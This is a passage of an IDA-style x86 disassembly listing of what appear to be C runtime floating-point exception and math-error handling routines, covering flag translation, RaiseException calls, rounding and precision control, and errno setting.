mov eax, [ebp-24h]
or al, 1
mov [ebp-24h], eax
mov ecx, [ebp-24h]
and ecx, 0FFFFFFE1h
or ecx, 2
mov [ebp-24h], ecx
mov edx, [ebp+18h]
mov [ebp-34h], edx
mov eax, [ebp+1Ch]
mov [ebp-30h], eax
lea ecx, [ebp+20h]
push ecx
lea edx, [ebp+10h]
push edx
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
lea edx, [ebp+28h]
push edx
lea eax, [ebp-5Ch]
push eax
call sub_42B610
add esp, 18h
loc_42B59E: ; CODE XREF: _0:0042B55C�j
mov ecx, [ebp+8]
push ecx
call sub_42BF80
add esp, 4
mov [ebp-4], eax
cmp ds:dword_454450, 0
jnz short loc_42B5EA
cmp dword ptr [ebp-4], 0
jz short loc_42B5EA
mov edx, [ebp+28h]
push edx
mov eax, [ebp+24h]
push eax
mov ecx, [ebp+20h]
push ecx
mov edx, [ebp+1Ch]
push edx
mov eax, [ebp+18h]
push eax
mov ecx, [ebp+14h]
push ecx
mov edx, [ebp+10h]
push edx
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp-4]
push ecx
call sub_42BE60
add esp, 24h
jmp short loc_42B60A
; ---------------------------------------------------------------------------
loc_42B5EA: ; CODE XREF: _0:0042B5B4�j _0:0042B5BA�j
mov edx, [ebp-4]
push edx
call sub_42BF00
add esp, 4
push 0FFFFh
mov eax, [ebp+28h]
push eax
call sub_42C2F0
add esp, 8
fld qword ptr [ebp+20h]
loc_42B60A: ; CODE XREF: _0:0042B5E8�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B610 proc near ; CODE XREF: sub_42B480+3E�p
; _0:0042B596�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+8], 0
mov edx, [ebp+arg_0]
mov dword ptr [edx+0Ch], 0
mov eax, [ebp+arg_8]
and eax, 10h
test eax, eax
jz short loc_42B654
mov [ebp+var_4], 0C000008Fh
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
or edx, 1
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_42B654: ; CODE XREF: sub_42B610+2C�j
mov ecx, [ebp+arg_8]
and ecx, 2
test ecx, ecx
jz short loc_42B673
mov [ebp+var_4], 0C0000093h
mov edx, [ebp+arg_0]
mov eax, [edx+4]
or al, 2
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
loc_42B673: ; CODE XREF: sub_42B610+4C�j
mov edx, [ebp+arg_8]
and edx, 1
test edx, edx
jz short loc_42B693
mov [ebp+var_4], 0C0000091h
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
or ecx, 4
mov edx, [ebp+arg_0]
mov [edx+4], ecx
loc_42B693: ; CODE XREF: sub_42B610+6B�j
mov eax, [ebp+arg_8]
and eax, 4
test eax, eax
jz short loc_42B6B3
mov [ebp+var_4], 0C000008Eh
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
or edx, 8
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_42B6B3: ; CODE XREF: sub_42B610+8B�j
mov ecx, [ebp+arg_8]
and ecx, 8
test ecx, ecx
jz short loc_42B6D2
mov [ebp+var_4], 0C0000090h
mov edx, [ebp+arg_0]
mov eax, [edx+4]
or al, 10h
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
loc_42B6D2: ; CODE XREF: sub_42B610+AB�j
mov edx, [ebp+arg_4]
mov eax, [edx]
and eax, 1
neg eax
sbb eax, eax
inc eax
and eax, 1
shl eax, 4
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
and edx, 0FFFFFFEFh
or edx, eax
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ecx]
and edx, 4
neg edx
sbb edx, edx
inc edx
and edx, 1
shl edx, 3
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
and ecx, 0FFFFFFF7h
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [eax]
and ecx, 8
neg ecx
sbb ecx, ecx
inc ecx
and ecx, 1
shl ecx, 2
mov edx, [ebp+arg_0]
mov eax, [edx+8]
and al, 0FBh
or eax, ecx
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [edx]
and eax, 10h
neg eax
sbb eax, eax
inc eax
and eax, 1
shl eax, 1
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
and edx, 0FFFFFFFDh
or edx, eax
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ecx]
and edx, 20h
neg edx
sbb edx, edx
inc edx
and edx, 1
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
and ecx, 0FFFFFFFEh
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx+8], ecx
call sub_42C2B0
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, 1
test eax, eax
jz short loc_42B7A2
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
or edx, 10h
mov eax, [ebp+arg_0]
mov [eax+0Ch], edx
loc_42B7A2: ; CODE XREF: sub_42B610+181�j
mov ecx, [ebp+var_8]
and ecx, 4
test ecx, ecx
jz short loc_42B7BA
mov edx, [ebp+arg_0]
mov eax, [edx+0Ch]
or al, 8
mov ecx, [ebp+arg_0]
mov [ecx+0Ch], eax
loc_42B7BA: ; CODE XREF: sub_42B610+19A�j
mov edx, [ebp+var_8]
and edx, 8
test edx, edx
jz short loc_42B7D3
mov eax, [ebp+arg_0]
mov ecx, [eax+0Ch]
or ecx, 4
mov edx, [ebp+arg_0]
mov [edx+0Ch], ecx
loc_42B7D3: ; CODE XREF: sub_42B610+1B2�j
mov eax, [ebp+var_8]
and eax, 10h
test eax, eax
jz short loc_42B7EC
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
or edx, 2
mov eax, [ebp+arg_0]
mov [eax+0Ch], edx
loc_42B7EC: ; CODE XREF: sub_42B610+1CB�j
mov ecx, [ebp+var_8]
and ecx, 20h
test ecx, ecx
jz short loc_42B804
mov edx, [ebp+arg_0]
mov eax, [edx+0Ch]
or al, 1
mov ecx, [ebp+arg_0]
mov [ecx+0Ch], eax
loc_42B804: ; CODE XREF: sub_42B610+1E4�j
mov edx, [ebp+arg_4]
mov eax, [edx]
and eax, 0C00h
mov [ebp+var_C], eax
cmp [ebp+var_C], 800h
ja short loc_42B834
cmp [ebp+var_C], 800h
jz short loc_42B84E
cmp [ebp+var_C], 0
jz short loc_42B872
cmp [ebp+var_C], 400h
jz short loc_42B860
jmp short loc_42B87F
; ---------------------------------------------------------------------------
loc_42B834: ; CODE XREF: sub_42B610+208�j
cmp [ebp+var_C], 0C00h
jz short loc_42B83F
jmp short loc_42B87F
; ---------------------------------------------------------------------------
loc_42B83F: ; CODE XREF: sub_42B610+22B�j
mov ecx, [ebp+arg_0]
mov edx, [ecx]
or edx, 3
mov eax, [ebp+arg_0]
mov [eax], edx
jmp short loc_42B87F
; ---------------------------------------------------------------------------
loc_42B84E: ; CODE XREF: sub_42B610+211�j
mov ecx, [ebp+arg_0]
mov edx, [ecx]
and edx, 0FFFFFFFCh
or edx, 2
mov eax, [ebp+arg_0]
mov [eax], edx
jmp short loc_42B87F
; ---------------------------------------------------------------------------
loc_42B860: ; CODE XREF: sub_42B610+220�j
mov ecx, [ebp+arg_0]
mov edx, [ecx]
and edx, 0FFFFFFFCh
or edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
jmp short loc_42B87F
; ---------------------------------------------------------------------------
loc_42B872: ; CODE XREF: sub_42B610+217�j
mov ecx, [ebp+arg_0]
mov edx, [ecx]
and edx, 0FFFFFFFCh
mov eax, [ebp+arg_0]
mov [eax], edx
loc_42B87F: ; CODE XREF: sub_42B610+222�j
; sub_42B610+22D�j ...
mov ecx, [ebp+arg_4]
mov edx, [ecx]
and edx, 300h
mov [ebp+var_10], edx
cmp [ebp+var_10], 0
jz short loc_42B8C8
cmp [ebp+var_10], 200h
jz short loc_42B8B6
cmp [ebp+var_10], 300h
jz short loc_42B8A7
jmp short loc_42B8D8
; ---------------------------------------------------------------------------
loc_42B8A7: ; CODE XREF: sub_42B610+293�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE3h
mov edx, [ebp+arg_0]
mov [edx], ecx
jmp short loc_42B8D8
; ---------------------------------------------------------------------------
loc_42B8B6: ; CODE XREF: sub_42B610+28A�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE3h
or ecx, 4
mov edx, [ebp+arg_0]
mov [edx], ecx
jmp short loc_42B8D8
; ---------------------------------------------------------------------------
loc_42B8C8: ; CODE XREF: sub_42B610+281�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE3h
or ecx, 8
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_42B8D8: ; CODE XREF: sub_42B610+295�j
; sub_42B610+2A4�j ...
mov eax, [ebp+arg_C]
and eax, 0FFFh
shl eax, 5
mov ecx, [ebp+arg_0]
mov edx, [ecx]
and edx, 0FFFE001Fh
or edx, eax
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+20h]
or edx, 1
mov eax, [ebp+arg_0]
mov [eax+20h], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+20h]
and edx, 0FFFFFFE1h
or edx, 2
mov eax, [ebp+arg_0]
mov [eax+20h], edx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_10]
mov eax, [edx]
mov [ecx+10h], eax
mov edx, [edx+4]
mov [ecx+14h], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
or ecx, 1
mov edx, [ebp+arg_0]
mov [edx+50h], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE1h
or ecx, 2
mov edx, [ebp+arg_0]
mov [edx+50h], ecx
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_14]
mov edx, [ecx]
mov [eax+40h], edx
mov ecx, [ecx+4]
mov [eax+44h], ecx
call sub_42C2D0
lea edx, [ebp+arg_0]
push edx
push 1
push 0
mov eax, [ebp+var_4]
push eax
call ds:dword_4F54EC ; RaiseException
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
shr edx, 4
and edx, 1
test edx, edx
jz short loc_42B98D
mov eax, [ebp+arg_4]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
mov edx, [ebp+arg_4]
mov [edx], ecx
loc_42B98D: ; CODE XREF: sub_42B610+36E�j
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
shr ecx, 3
and ecx, 1
test ecx, ecx
jz short loc_42B9A9
mov edx, [ebp+arg_4]
mov eax, [edx]
and al, 0FBh
mov ecx, [ebp+arg_4]
mov [ecx], eax
loc_42B9A9: ; CODE XREF: sub_42B610+38B�j
mov edx, [ebp+arg_0]
mov eax, [edx+8]
shr eax, 2
and eax, 1
test eax, eax
jz short loc_42B9C6
mov ecx, [ebp+arg_4]
mov edx, [ecx]
and edx, 0FFFFFFF7h
mov eax, [ebp+arg_4]
mov [eax], edx
loc_42B9C6: ; CODE XREF: sub_42B610+3A7�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
shr edx, 1
and edx, 1
test edx, edx
jz short loc_42B9E2
mov eax, [ebp+arg_4]
mov ecx, [eax]
and ecx, 0FFFFFFEFh
mov edx, [ebp+arg_4]
mov [edx], ecx
loc_42B9E2: ; CODE XREF: sub_42B610+3C3�j
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
and ecx, 1
test ecx, ecx
jz short loc_42B9FB
mov edx, [ebp+arg_4]
mov eax, [edx]
and al, 0DFh
mov ecx, [ebp+arg_4]
mov [ecx], eax
loc_42B9FB: ; CODE XREF: sub_42B610+3DD�j
mov edx, [ebp+arg_0]
mov eax, [edx]
and eax, 3
mov [ebp+var_14], eax
cmp [ebp+var_14], 3
ja short loc_42BA59
mov ecx, [ebp+var_14]
jmp off_42BAC1[ecx*4]
loc_42BA16: ; DATA XREF: _0:0042BACD�o
mov edx, [ebp+arg_4]
mov eax, [edx]
and ah, 0F3h
or ah, 0Ch
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_42BA59
; ---------------------------------------------------------------------------
loc_42BA28: ; CODE XREF: sub_42B610+3FF�j
; DATA XREF: _0:0042BAC9�o
mov edx, [ebp+arg_4]
mov eax, [edx]
and ah, 0F3h
or ah, 8
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_42BA59
; ---------------------------------------------------------------------------
loc_42BA3A: ; CODE XREF: sub_42B610+3FF�j
; DATA XREF: _0:0042BAC5�o
mov edx, [ebp+arg_4]
mov eax, [edx]
and ah, 0F3h
or ah, 4
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_42BA59
; ---------------------------------------------------------------------------
loc_42BA4C: ; CODE XREF: sub_42B610+3FF�j
; DATA XREF: _0:off_42BAC1�o
mov edx, [ebp+arg_4]
mov eax, [edx]
and ah, 0F3h
mov ecx, [ebp+arg_4]
mov [ecx], eax
loc_42BA59: ; CODE XREF: sub_42B610+3FA�j
; sub_42B610+416�j ...
mov edx, [ebp+arg_0]
mov eax, [edx]
shr eax, 2
and eax, 7
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_42BA7B
cmp [ebp+var_18], 1
jz short loc_42BA8D
cmp [ebp+var_18], 2
jz short loc_42BA9F
jmp short loc_42BAAC
; ---------------------------------------------------------------------------
loc_42BA7B: ; CODE XREF: sub_42B610+45B�j
mov ecx, [ebp+arg_4]
mov edx, [ecx]
and dh, 0F3h
or dh, 3
mov eax, [ebp+arg_4]
mov [eax], edx
jmp short loc_42BAAC
; ---------------------------------------------------------------------------
loc_42BA8D: ; CODE XREF: sub_42B610+461�j
mov ecx, [ebp+arg_4]
mov edx, [ecx]
and dh, 0F3h
or dh, 2
mov eax, [ebp+arg_4]
mov [eax], edx
jmp short loc_42BAAC
; ---------------------------------------------------------------------------
loc_42BA9F: ; CODE XREF: sub_42B610+467�j
mov ecx, [ebp+arg_4]
mov edx, [ecx]
and dh, 0F3h
mov eax, [ebp+arg_4]
mov [eax], edx
loc_42BAAC: ; CODE XREF: sub_42B610+469�j
; sub_42B610+47B�j ...
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_14]
mov eax, [ecx+40h]
mov [edx], eax
mov ecx, [ecx+44h]
mov [edx+4], ecx
mov esp, ebp
pop ebp
retn
sub_42B610 endp
; ---------------------------------------------------------------------------
off_42BAC1 dd offset loc_42BA4C ; DATA XREF: sub_42B610+3FF�r
dd offset loc_42BA3A
dd offset loc_42BA28
dd offset loc_42BA16
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BAE0 proc near ; CODE XREF: sub_42B480+12�p
; _0:0042B552�p
var_44 = dword ptr -44h
var_40 = qword ptr -40h
var_38 = qword ptr -38h
var_30 = qword ptr -30h
var_28 = qword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 44h
mov eax, [ebp+arg_0]
and eax, 1Fh
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
and ecx, 8
test ecx, ecx
jz short loc_42BB1A
mov edx, [ebp+arg_8]
and edx, 1
test edx, edx
jz short loc_42BB1A
push 1
call sub_42C330
add esp, 4
mov eax, [ebp+var_4]
and al, 0F7h
mov [ebp+var_4], eax
jmp loc_42BE1E
; ---------------------------------------------------------------------------
loc_42BB1A: ; CODE XREF: sub_42BAE0+17�j
; sub_42BAE0+21�j
mov ecx, [ebp+arg_0]
and ecx, 4
test ecx, ecx
jz short loc_42BB45
mov edx, [ebp+arg_8]
and edx, 4
test edx, edx
jz short loc_42BB45
push 4
call sub_42C330
add esp, 4
mov eax, [ebp+var_4]
and al, 0FBh
mov [ebp+var_4], eax
jmp loc_42BE1E
; ---------------------------------------------------------------------------
loc_42BB45: ; CODE XREF: sub_42BAE0+42�j
; sub_42BAE0+4C�j
mov ecx, [ebp+arg_0]
and ecx, 1
test ecx, ecx
jz loc_42BCC1
mov edx, [ebp+arg_8]
and edx, 8
test edx, edx
jz loc_42BCC1
push 8
call sub_42C330
add esp, 4
mov eax, [ebp+arg_8]
and eax, 0C00h
mov [ebp+var_20], eax
cmp [ebp+var_20], 800h
ja short loc_42BBA0
cmp [ebp+var_20], 800h
jz short loc_42BBF5
cmp [ebp+var_20], 0
jz short loc_42BBB2
cmp [ebp+var_20], 400h
jz loc_42BC35
jmp loc_42BCB3
; ---------------------------------------------------------------------------
loc_42BBA0: ; CODE XREF: sub_42BAE0+9D�j
cmp [ebp+var_20], 0C00h
jz loc_42BC75
jmp loc_42BCB3
; ---------------------------------------------------------------------------
loc_42BBB2: ; CODE XREF: sub_42BAE0+AC�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_43D2F0
fnstsw ax
test ah, 41h
jnz short loc_42BBD7
mov edx, dword ptr ds:dbl_454150
mov dword ptr [ebp+var_28], edx
mov eax, dword ptr ds:dbl_454150+4
mov dword ptr [ebp+var_28+4], eax
jmp short loc_42BBE2
; ---------------------------------------------------------------------------
loc_42BBD7: ; CODE XREF: sub_42BAE0+E2�j
fld ds:dbl_454150
fchs
fstp [ebp+var_28]
loc_42BBE2: ; CODE XREF: sub_42BAE0+F5�j
mov ecx, [ebp+arg_4]
mov edx, dword ptr [ebp+var_28]
mov [ecx], edx
mov eax, dword ptr [ebp+var_28+4]
mov [ecx+4], eax
jmp loc_42BCB3
; ---------------------------------------------------------------------------
loc_42BBF5: ; CODE XREF: sub_42BAE0+A6�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_43D2F0
fnstsw ax
test ah, 41h
jnz short loc_42BC1A
mov edx, dword ptr ds:dbl_454150
mov dword ptr [ebp+var_30], edx
mov eax, dword ptr ds:dbl_454150+4
mov dword ptr [ebp+var_30+4], eax
jmp short loc_42BC25
; ---------------------------------------------------------------------------
loc_42BC1A: ; CODE XREF: sub_42BAE0+125�j
fld ds:dbl_454160
fchs
fstp [ebp+var_30]
loc_42BC25: ; CODE XREF: sub_42BAE0+138�j
mov ecx, [ebp+arg_4]
mov edx, dword ptr [ebp+var_30]
mov [ecx], edx
mov eax, dword ptr [ebp+var_30+4]
mov [ecx+4], eax
jmp short loc_42BCB3
; ---------------------------------------------------------------------------
loc_42BC35: ; CODE XREF: sub_42BAE0+B5�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_43D2F0
fnstsw ax
test ah, 41h
jnz short loc_42BC5A
mov edx, dword ptr ds:dbl_454160
mov dword ptr [ebp+var_38], edx
mov eax, dword ptr ds:dbl_454160+4
mov dword ptr [ebp+var_38+4], eax
jmp short loc_42BC65
; ---------------------------------------------------------------------------
loc_42BC5A: ; CODE XREF: sub_42BAE0+165�j
fld ds:dbl_454150
fchs
fstp [ebp+var_38]
loc_42BC65: ; CODE XREF: sub_42BAE0+178�j
mov ecx, [ebp+arg_4]
mov edx, dword ptr [ebp+var_38]
mov [ecx], edx
mov eax, dword ptr [ebp+var_38+4]
mov [ecx+4], eax
jmp short loc_42BCB3
; ---------------------------------------------------------------------------
loc_42BC75: ; CODE XREF: sub_42BAE0+C7�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_43D2F0
fnstsw ax
test ah, 41h
jnz short loc_42BC9A
mov edx, dword ptr ds:dbl_454160
mov dword ptr [ebp+var_40], edx
mov eax, dword ptr ds:dbl_454160+4
mov dword ptr [ebp+var_40+4], eax
jmp short loc_42BCA5
; ---------------------------------------------------------------------------
loc_42BC9A: ; CODE XREF: sub_42BAE0+1A5�j
fld ds:dbl_454160
fchs
fstp [ebp+var_40]
loc_42BCA5: ; CODE XREF: sub_42BAE0+1B8�j
mov ecx, [ebp+arg_4]
mov edx, dword ptr [ebp+var_40]
mov [ecx], edx
mov eax, dword ptr [ebp+var_40+4]
mov [ecx+4], eax
loc_42BCB3: ; CODE XREF: sub_42BAE0+BB�j
; sub_42BAE0+CD�j ...
mov ecx, [ebp+var_4]
and ecx, 0FFFFFFFEh
mov [ebp+var_4], ecx
jmp loc_42BE1E
; ---------------------------------------------------------------------------
loc_42BCC1: ; CODE XREF: sub_42BAE0+6D�j
; sub_42BAE0+7B�j
mov edx, [ebp+arg_0]
and edx, 2
test edx, edx
jz loc_42BE1E
mov eax, [ebp+arg_8]
and eax, 10h
test eax, eax
jz loc_42BE1E
mov [ebp+var_8], 0
mov ecx, [ebp+arg_0]
and ecx, 10h
test ecx, ecx
jz short loc_42BCF5
mov [ebp+var_8], 1
loc_42BCF5: ; CODE XREF: sub_42BAE0+20C�j
mov edx, [ebp+arg_4]
fld qword ptr [edx]
fcomp ds:dbl_43D2F0
fnstsw ax
test ah, 40h
jnz loc_42BDFE
lea eax, [ebp+var_18]
push eax ; int
mov ecx, [ebp+arg_4]
mov edx, [ecx+4]
push edx
mov eax, [ecx]
push eax ; double
call sub_42C170
add esp, 0Ch
fstp [ebp+var_10]
mov ecx, [ebp+var_18]
sub ecx, 600h
mov [ebp+var_14], ecx
cmp [ebp+var_14], 0FFFFFBCEh
jge short loc_42BD51
fld [ebp+var_10]
fmul ds:dbl_43D2F0
fstp [ebp+var_10]
mov [ebp+var_8], 1
jmp loc_42BDEE
; ---------------------------------------------------------------------------
loc_42BD51: ; CODE XREF: sub_42BAE0+257�j
fld [ebp+var_10]
fcomp ds:dbl_43D2F0
fnstsw ax
test ah, 1
jz short loc_42BD6A
mov [ebp+var_44], 1
jmp short loc_42BD71
; ---------------------------------------------------------------------------
loc_42BD6A: ; CODE XREF: sub_42BAE0+27F�j
mov [ebp+var_44], 0
loc_42BD71: ; CODE XREF: sub_42BAE0+288�j
mov edx, [ebp+var_44]
mov [ebp+var_1C], edx
mov ax, word ptr [ebp+var_10+6]
and ax, 0Fh
mov word ptr [ebp+var_10+6], ax
mov cx, word ptr [ebp+var_10+6]
or cl, 10h
mov word ptr [ebp+var_10+6], cx
jmp short loc_42BD99
; ---------------------------------------------------------------------------
loc_42BD90: ; CODE XREF: sub_42BAE0+2FE�j
mov edx, [ebp+var_14]
add edx, 1
mov [ebp+var_14], edx
loc_42BD99: ; CODE XREF: sub_42BAE0+2AE�j
cmp [ebp+var_14], 0FFFFFC03h
jge short loc_42BDE0
mov eax, dword ptr [ebp+var_10]
and eax, 1
test eax, eax
jz short loc_42BDB9
cmp [ebp+var_8], 0
jnz short loc_42BDB9
mov [ebp+var_8], 1
loc_42BDB9: ; CODE XREF: sub_42BAE0+2CA�j
; sub_42BAE0+2D0�j
mov ecx, dword ptr [ebp+var_10]
shr ecx, 1
mov dword ptr [ebp+var_10], ecx
mov edx, dword ptr [ebp+var_10+4]
and edx, 1
test edx, edx
jz short loc_42BDD6
mov eax, dword ptr [ebp+var_10]
or eax, 80000000h
mov dword ptr [ebp+var_10], eax
loc_42BDD6: ; CODE XREF: sub_42BAE0+2E9�j
mov ecx, dword ptr [ebp+var_10+4]
shr ecx, 1
mov dword ptr [ebp+var_10+4], ecx
jmp short loc_42BD90
; ---------------------------------------------------------------------------
loc_42BDE0: ; CODE XREF: sub_42BAE0+2C0�j
cmp [ebp+var_1C], 0
jz short loc_42BDEE
fld [ebp+var_10]
fchs
fstp [ebp+var_10]
loc_42BDEE: ; CODE XREF: sub_42BAE0+26C�j
; sub_42BAE0+304�j
mov edx, [ebp+arg_4]
mov eax, dword ptr [ebp+var_10]
mov [edx], eax
mov ecx, dword ptr [ebp+var_10+4]
mov [edx+4], ecx
jmp short loc_42BE05
; ---------------------------------------------------------------------------
loc_42BDFE: ; CODE XREF: sub_42BAE0+225�j
mov [ebp+var_8], 1
loc_42BE05: ; CODE XREF: sub_42BAE0+31C�j
cmp [ebp+var_8], 0
jz short loc_42BE15
push 10h
call sub_42C330
add esp, 4
loc_42BE15: ; CODE XREF: sub_42BAE0+329�j
mov edx, [ebp+var_4]
and edx, 0FFFFFFFDh
mov [ebp+var_4], edx
loc_42BE1E: ; CODE XREF: sub_42BAE0+35�j
; sub_42BAE0+60�j ...
mov eax, [ebp+arg_0]
and eax, 10h
test eax, eax
jz short loc_42BE45
mov ecx, [ebp+arg_8]
and ecx, 20h
test ecx, ecx
jz short loc_42BE45
push 20h
call sub_42C330
add esp, 4
mov edx, [ebp+var_4]
and edx, 0FFFFFFEFh
mov [ebp+var_4], edx
loc_42BE45: ; CODE XREF: sub_42BAE0+346�j
; sub_42BAE0+350�j
xor eax, eax
cmp [ebp+var_4], 0
setz al
mov esp, ebp
pop ebp
retn
sub_42BAE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42BE60(int,int,int,int,int,int,double,int)
sub_42BE60 proc near ; CODE XREF: sub_42B3B0+2A�p
; _0:0042B44A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push eax
call sub_42BF40
add esp, 4
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_42BED7
mov ecx, [ebp+arg_0]
mov [ebp+var_20], ecx
mov edx, [ebp+arg_8]
mov [ebp+var_18], edx
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov ecx, [ebp+arg_10]
mov [ebp+var_10], ecx
mov edx, [ebp+arg_14]
mov [ebp+var_C], edx
mov eax, dword ptr [ebp+arg_18]
mov dword ptr [ebp+var_8], eax
mov ecx, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], ecx
push 0FFFFh
mov edx, [ebp+arg_20]
push edx
call sub_42C2F0
add esp, 8
lea eax, [ebp+var_20]
push eax
call sub_431F50
add esp, 4
test eax, eax
jnz short loc_42BED2
mov ecx, [ebp+arg_0]
push ecx
call sub_42BF00
add esp, 4
loc_42BED2: ; CODE XREF: sub_42BE60+64�j
fld [ebp+var_8]
jmp short loc_42BEF7
; ---------------------------------------------------------------------------
loc_42BED7: ; CODE XREF: sub_42BE60+19�j
push 0FFFFh
mov edx, [ebp+arg_20]
push edx
call sub_42C2F0
add esp, 8
mov eax, [ebp+arg_0]
push eax
call sub_42BF00
add esp, 4
fld [ebp+arg_18]
loc_42BEF7: ; CODE XREF: sub_42BE60+75�j
mov esp, ebp
pop ebp
retn
sub_42BE60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BF00 proc near ; CODE XREF: sub_42B480+92�p
; _0:0042B5EE�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
cmp [ebp+var_4], 1
jz short loc_42BF1E
cmp [ebp+var_4], 1
jle short loc_42BF36
cmp [ebp+var_4], 3
jle short loc_42BF2B
jmp short loc_42BF36
; ---------------------------------------------------------------------------
loc_42BF1E: ; CODE XREF: sub_42BF00+E�j
call sub_429A90
mov dword ptr [eax], 21h
jmp short loc_42BF36
; ---------------------------------------------------------------------------
loc_42BF2B: ; CODE XREF: sub_42BF00+1A�j
call sub_429A90
mov dword ptr [eax], 22h
loc_42BF36: ; CODE XREF: sub_42BF00+14�j
; sub_42BF00+1C�j ...
mov esp, ebp
pop ebp
retn
sub_42BF00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BF40 proc near ; CODE XREF: sub_42BE60+A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_42BF56
; ---------------------------------------------------------------------------
loc_42BF4D: ; CODE XREF: sub_42BF40:loc_42BF77�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_42BF56: ; CODE XREF: sub_42BF40+B�j
cmp [ebp+var_4], 1Bh
jge short loc_42BF79
mov ecx, [ebp+var_4]
mov edx, ds:dword_454078[ecx*8]
cmp edx, [ebp+arg_0]
jnz short loc_42BF77
mov eax, [ebp+var_4]
mov eax, ds:off_45407C[eax*8]
jmp short loc_42BF7B
; ---------------------------------------------------------------------------
loc_42BF77: ; CODE XREF: sub_42BF40+29�j
jmp short loc_42BF4D
; ---------------------------------------------------------------------------
loc_42BF79: ; CODE XREF: sub_42BF40+1A�j
xor eax, eax
